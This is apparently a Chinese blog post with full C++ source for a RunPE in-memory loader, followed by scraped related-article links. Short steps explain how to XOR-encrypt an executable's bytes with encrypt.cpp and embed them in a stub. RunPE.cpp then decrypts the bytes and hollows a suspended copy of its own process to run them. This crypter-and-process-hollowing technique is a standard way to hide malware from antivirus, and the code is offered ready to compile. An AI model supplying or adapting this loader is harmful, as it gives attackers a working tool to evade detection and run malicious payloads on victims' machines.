内存中运行文件

拿exe并在HxD或010中打开 - cntrl+a copy as C

粘贴到encrypt.cpp

编译并运行encrypt.cpp - 创建shellcode.txt

从shellcode.txt复制char数组,并替换runPE.cpp中的rawData []

编译生成最终的runPE.exe

使用XOR密钥解密,加载到内存中执行。

encrypt.cpp

//encrypt shellcode prior to storing in stub

//store in shellcodeEncrypted.txt

//copy into runPE.cpp

#include <iostream>

#include <fstream>

#include <string>

using namespace std;

//Real PE shellcode dump here - fix length also

const int length = 2;

unsigned char rawData[length] = {

	0x00, 0xff

};

void crypt(unsigned char rawData[], int length)

{

	char key = 0x42;

	for (int i = 0; i < length; i++)

	{

		rawData[i] = (char)(rawData[i] ^ key);

	}

}

struct HexCharStruct

{

	unsigned char c;

	HexCharStruct(unsigned char _c) : c(_c) { }

};

inline std::ostream& operator<<(std::ostream& o, const HexCharStruct& hs)

{

	return (o << std::hex << (int)hs.c);

}

inline HexCharStruct hex(unsigned char _c)

{

	return HexCharStruct(_c);

}

int main()

{

	ofstream output;

	output.open("shellcodeEncrypted.txt");

	crypt(rawData, length);

	output << "unsigned char rawData[" << to_string(length) << "]" \

		<< " = { ";

	for (int i = 0; i < length; i++)

	{

		output << "0x" << hex(rawData[i]) << ",";

		if (i % 20 == 0)

		{

			output << endl;

		}

	}

	output << "};";

}

RunPE.cpp

#include <iostream> // Standard C++ library for console I/O

#include <string> // Standard C++ Library for string manip

#include <fstream>

#include <Windows.h> // WinAPI Header

#include <TlHelp32.h> //WinAPI Process API

// use this if you want to read the executable from disk

HANDLE MapFileToMemory(LPCSTR filename)

{

	std::streampos size;

	std::fstream file(filename, std::ios::in | std::ios::binary | std::ios::ate);

	if (file.is_open())

	{

		size = file.tellg();

		char* Memblock = new char[size]();

		file.seekg(0, std::ios::beg);

		file.read(Memblock, size);

		file.close();

		return Memblock;

	}

	return 0;

}

int RunPortableExecutable(void* Image)

{

	IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols

	IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols

	IMAGE_SECTION_HEADER* SectionHeader;

	PROCESS_INFORMATION PI;

	STARTUPINFOA SI;

	CONTEXT* CTX;

	DWORD* ImageBase; //Base address of the image

	void* pImageBase; // Pointer to the image base

	int count;

	char CurrentFilePath[1024];

	DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable

	NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // Initialize

	GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable

	if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File.

	{

		ZeroMemory(&PI, sizeof(PI)); // Null the memory

		ZeroMemory(&SI, sizeof(SI)); // Null the memory

		if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,

			CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current

													 //process in suspended state, for the new image.

		{

			// Allocate memory for the context.

			CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));

			CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

			if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread

			{

				// Read instructions

				ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

				pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),

					NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

				// Write the image to the process

				WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

				for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)

				{

					SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

					WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),

						LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);

				}

				WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),

					LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

				// Move address of entry point to the eax register

				CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;

				SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context

				ResumeThread(PI.hThread); //´Start the process/call main()

				return 0; // Operation was successful.

			}

		}

	}

}

// enter valid bytes of a program here.

//Using 010 Hex editor or HxD - copy all as C hex works perfectly. A complete hexdump, no magic ;)

void decrypt(unsigned char rawData[], int length)

{

	char key = 0x42;

	for (int i = 0; i < length; i++)

	{

		rawData[i] = (char)(rawData[i] ^ key);

	}

}

//Place encrypted shellcode here - fix length also!

const int length = 2;

unsigned char rawData[length] = {

	0x00, 0x00

};

int main()

{

	decrypt(rawData, length);

	RunPortableExecutable(rawData); // run executable from the array

	getchar();

}

内存运行PE文件的更多相关文章

  1. 深入学习PE文件(转)

    PE文件是Win32的原生文件格式.每一个Win32可执行文件都遵循PE文件格式.对PE文件格式的了解可以加深你对Win32系统的深入理解. 一. 基本结构. 上图便是PE文件的基本结构.(注意:DO ...

  2. 深入剖析PE文件

    不赖猴的笔记,转载请注明出处. 深入剖析PE文件 PE文件是Win32的原生文件格式.每一个Win32可执行文件都遵循PE文件格式.对PE文件格式的了解可以加深你对Win32系统的深入理解. 一.   ...

  3. PE文件简介

    PE文件的全称是Portable Executable,意为可移植的可执行的文件,常见的EXE.DLL.OCX.SYS.COM都是PE文件,PE文件是微软Windows操作系统上的程序文件(可能是间接 ...

  4. PE 文件

    一.PE文件基本结构 上图便是PE文件的基本结构.(注意:DOS MZ Header和部分PE header的大小是不变的:DOS stub部分的大小是可变的.) 二.Section 详解 一个PE文 ...

  5. 文件中pe到内存中pe

    前言 学pe的时候被困扰了很久,终于在某处给我找到了,打算打出来读一读代码 这边我们是从文件中的pe转到运行中的pe,然后再缩小存储到文件的pe 这边我们需要知道内存中对齐是0x1000,文件对齐是0 ...

  6. 打造XP下可运行的微型PE文件

    前几天和朋友交流技术,提到手工打造微型PE文件,他说现在网上流传的大部分版本在XP SP3下都不能运行,于是心血来潮,拍着胸脯说:“你放心,忙完了帮你做一个.”后来花了半天时间,终于打造出一个XP下可 ...

  7. PE文件从文件加载到内存,再从内存读取,然后存盘到文件

    // mem.cpp : 定义控制台应用程序的入口点. //PE文件从文件加载到内存,再从内存读取,然后存盘到文件 #include "stdafx.h" #include < ...

  8. 分配粒度和内存页面大小(x86处理器平台的分配粒度是64K,内存页是4K,所以section都是0x1000对齐,硬盘扇区大小是512字节,所以PE文件默认文件对齐是0x200)

    分配粒度和内存页面大小 x86处理器平台的分配粒度是64K,32位CPU的内存页面大小是4K,64位是8K,保留内存地址空间总是要和分配粒度对齐.一个分配粒度里包含16个内存页面. 这是个概念,具体不 ...

  9. 浅析MSIL中间语言——PE文件结构篇

    一.开篇 开篇我想讲一下于本文无关的话题,其实我很想美化一下自己博客园一直没时间弄,无意间找了博客园李宝亨的博客园里面有一篇分享自己主题的文章,我就将这个模板暂时用作我的blog主题,我要讲述一个关于 ...

随机推荐

  1. (二)IDEA使用,快捷键

    idea的快捷键设置: idea支持使用其他开发工具的快捷键,可以在此设置: idea 默认的本身的快捷键: 常用快捷键 Ctrl + Alt + s 打开设置选项 Alt + Enter 修复提示 ...

  2. 讲心情 demo1

    讲道理找了一个安心而又稳定的工作. 每天活闲的蛋疼, 这种对于老年人来说可能会很好,但是,对于一个24岁的人可能就是坟墓了. 么事呻吟一下.   爬虫这条路越来越远了. 写下今年计划吧..机器学习入下 ...

  3. YAML_15 include and roles

    在编写playbook的时候随着项目越来越大,playbook越来越复杂.可以把一些play.task 或 handler放到其他文件中,通过包含进来是一个不错的选择. roles像是加强版的incl ...

  4. suds

    Suds: 是一个轻量级的SOAP客户端 pip install suds 可以访问webservice 选择公网的Webservice,http://www.webxml.com.cn/webser ...

  5. 【概率论】5-8:Beta分布(The Beta Distributions)

    title: [概率论]5-8:Beta分布(The Beta Distributions) categories: - Mathematic - Probability keywords: - Th ...

  6. Loadrunner录制+运行+结果-【飞机订票系统实战】

    目录结构: 一.LoadRunner实现订票系统脚本录制 二.Loadrunner实现订票系统IP欺骗(此处可以不设置) 三.Loadrunner运行录制的脚本 四.Load generator配置 ...

  7. C++2.0新特性(五)——<Rvalue_reference和move语义>

    一.Rvalue_reference(右值引用)和move语义 1.左右值概念区分 左值:表达式结束后依然存在的对象,我们也叫做变量: 右值:表达式结束后就不存在的临时对象. 2.判断左值和右值 能对 ...

  8. 小程序input组件失焦的使用

    失去焦点就开始做数据请求判断电话号码是正确 <view class='register-input-box'> <input class='register-input' place ...

  9. ciscn2019华北赛区半决赛day1web5CyberPunk

    刚比赛完的一段时间期末考试云集,没有时间复现题目.趁着假期,争取多复现几道题. 复现平台 buuoj.cn 解题过程 首先进入题目页面 看起来没有什么特别的,就是一个可以提交信息的页面.查看响应报文也 ...

  10. Rancher2.3.2部署Kubenetes Dashboard

    首先进入到集群中的System命令空间,因为kubenetes dashboard是给整个集群使用的,并不是默认的Default命名空间使用的 Default命名空间,是默认的命名空间,也是在部署其他 ...